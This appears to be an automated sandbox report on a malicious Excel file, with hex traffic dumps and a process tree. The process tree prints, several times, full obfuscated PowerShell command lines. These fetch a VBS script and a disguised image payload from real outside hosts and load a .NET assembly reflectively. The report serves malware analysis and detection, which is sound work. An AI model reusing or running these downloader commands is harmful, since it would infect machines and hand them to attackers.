                                                                                                                                                                                  2024-12-03 13:01:34 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                                                                                                                                  Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                                                                                                                                  2024-12-03 13:01:34 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                                                                                                                                  Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                                                                                                                                  2024-12-03 13:01:34 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                                                                                                                  Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                                                                                                                                                  Statistics

                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                  Behavior

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  System Behavior

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                  Start time:08:00:31
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                  Imagebase:0x13f7f0000
                                                                                                                                                                                  File size:28'253'536 bytes
                                                                                                                                                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                  Start time:08:00:56
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                                                  Imagebase:0x13f6d0000
                                                                                                                                                                                  File size:13'824 bytes
                                                                                                                                                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                  Start time:08:01:01
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                                                                                                                                                                                  Imagebase:0x4a470000
                                                                                                                                                                                  File size:345'088 bytes
                                                                                                                                                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                  Start time:08:01:02
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                                                                                                                                                                                  Imagebase:0x13f3f0000
                                                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                  Start time:08:01:08
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline"
                                                                                                                                                                                  Imagebase:0x13fa00000
                                                                                                                                                                                  File size:2'758'280 bytes
                                                                                                                                                                                  MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                  Start time:08:01:09
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBA2.tmp" "c:\Users\user\AppData\Local\Temp\sietgs52\CSC6D12096A8D2545939E28F0D748EE93EA.TMP"
                                                                                                                                                                                  Imagebase:0x13f6b0000
                                                                                                                                                                                  File size:52'744 bytes
                                                                                                                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                  Start time:08:01:14
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS"
                                                                                                                                                                                  Imagebase:0xff7a0000
                                                                                                                                                                                  File size:168'960 bytes
                                                                                                                                                                                  MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                  Start time:08:01:15
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
                                                                                                                                                                                  Imagebase:0x13f3f0000
                                                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                  Start time:08:01:16
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                                                  Imagebase:0x13fa60000
                                                                                                                                                                                  File size:13'824 bytes
                                                                                                                                                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                  Start time:08:01:22
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                                                                                                                                                                                  Imagebase:0x4a910000
                                                                                                                                                                                  File size:345'088 bytes
                                                                                                                                                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                  Start time:08:01:22
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                                                                                                                                                                                  Imagebase:0x13f3f0000
                                                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                  Start time:08:01:23
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.cmdline"
                                                                                                                                                                                  Imagebase:0x13f220000
                                                                                                                                                                                  File size:2'758'280 bytes
                                                                                                                                                                                  MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                  Start time:08:01:23
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF4EA.tmp" "c:\Users\user\AppData\Local\Temp\tc3erle0\CSCE42B52D3958749FFBAC69A71E4122F1.TMP"
                                                                                                                                                                                  Imagebase:0x13f8f0000
                                                                                                                                                                                  File size:52'744 bytes
                                                                                                                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                  Start time:08:01:28
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                  Wow64 process (32bit):false
